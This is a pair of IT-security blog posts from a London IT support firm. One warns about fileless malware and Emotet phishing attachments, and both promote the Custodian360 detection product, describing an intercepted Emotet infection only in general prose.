Fitzrovia IT Logo

The Rise of Fileless Malware Delivery and the Need for Better Defences

Fileless malware is a type of malicious software that is able to bypass most security measures by residing within a user’s PC, exploiting existing systems including the RAM and registry.

This year has seen a reported 265% increase in fileless malware threats compared to the first half of 2018. Increasingly sophisticated in its delivery and difficult to detect, fileless malware has become a major security concern for businesses across all sectors.

Preventing permanent damage to your business

With detection of fileless malware a challenging endeavour, prevention is a strong first step to reducing the risk of permanent damage to your business. This starts with proper user training.

“Fundamentally, the biggest security-related challenge is the vulnerability that sits in the chair,” said Dan Kent, Head of Technical for Fitzrovia IT, a leading IT support company in London.

“People – human error – are typically the catalyst for a PC getting a virus. That’s why end-user training is so important. You need to make sure your staff know what to look out for and how to recognise when something is not right,” he said.

In addition to end-user training, it is essential to consistently review your company’s IT security policies, taking into consideration:

  • Do you have a strong disaster recovery plan in place?
  • Is your business Cyber Essentials accredited?
  • If your company has a ‘Bring Your Own Device’ policy, do you have proper MDM and Security policies installed?
  • Are you working with a dedicated IT support provider?

Keeping your systems properly patched and up to date can also prevent exploitation of vulnerabilities by fileless malware.  

“All these things matter and can make a difference, no matter how small,” said Dan. “All areas of security must be aligned in order to prevent large-scale breaches and irreversible damage.”

How Custodian360 can help

To properly combat fileless malware delivery, enhanced services and defences are needed. Solutions like Custodian360 are able to spot and stop infectious malware immediately, identifying potential behaviour-based risks in real time.

“Custodian360 have been incredibly effective at preventing fileless malware,” said Dan. “In environments with Custodian360 running alongside alternative products, Custodian360 is able to catch and quarantine issues that the other systems don’t see.”

“Custodian360 is a great example of how machine learning and artificial intelligence can provide advanced methods of threat detection, delivering full-coverage protection for your business.”

Written by the team at Fitzrovia IT, delivering trusted IT support in London for 20 years.

Emotet Returns

Emotet Trojan

 

Since its initial discovery in 2014, the Emotet trojan has become an increasingly dangerous and persistent threat to users and organisations across the globe. The US Department of Homeland Security CISA division, refers to emotet as ‘among the most costly and destructive malware’ affecting from small to large scale organisations of both the private and public sectors.

Emotet started out as a way to steal users banking details, the scope and capabilities of this trojan have changed drastically.

From spreading itself across a network infecting other machines to skimming Outlook contact information to use in spear phishing attacks to stealing browser history, user credentials and installing other malware such as backdoors and ransomware, emotet can be extremely damaging to an organisation. Also, due to Emotet being polymorphic and able to constantly change and modify itself, it is increasingly difficult to detect and prevent against using typical signature-based methods with hundreds of unique payload variants discovered daily.

Phishing Email Example

Phishing Email Example

Emotet trojans will generally arrive on a user’s machine via emails like the above example. Spam emails spoofing common brands and institutions (banks, government departments) with layouts and language designed to encourage the user to click on the malicious attachment or link to sites hosting the document for download.

Crimeware-as-a-service (CaaS) helps ensure that new versions of these email attachments can be generated and distributed on a near constant basis ensuring its ability to evade traditional AV on Zero-day.

We regularly see new Emotet detections and an example of a malicious emotet attachment that one of our agents detected had been created only 4 hours prior.

VT History

In a short span of time, a new .doc attachment was generated with a new file hash value which would be unknown to a traditional AV solution was attached and emailed to an unsuspecting user ready for the morning inbox clear-out.

At the time of the detection, our threat researcher uploaded a copy of the threat file to VirusTotal where only 8 other Vendors were aware of and had the file marked as malicious.

VT Detections

This means that on many other AV solutions, the file would have been allowed to run and would not have been detected.

For this example, the user clicks on the attachment unaware as the document starts delivery of the Emotet payload.

From the attack storyline on our management console, we can see that as soon as the doc is opened, it attempts to utilise PowerShell to run obfuscated code. Code obfuscation is one of the methods used by hackers to evade static analysis engines in Anti-Virus and help disguise their activity.

Story Line

In this case, the PowerShell code attempts to create a network connection to reach out to a compromised domain online and download the additional emotet payload to the users’ machine to exploit further.

For any business, such an attack could cause severe consequences that would translate to high financial costs and reputational damage.

In this case, the threat was detected by the behavioural engine of the agent which was able to determine that the activity exhibited by the threat was malicious and then, autonomously killed and quarantined the threat from the users’ machine. After the threat was investigated by our security analysts, the threat was successfully remediated against without any disruption or compromise to the user’s machine.

Without our agent in place on the user’s machine, the result may not have been as favourable.

 

Alex James – Lead Security Analyst – Custodian360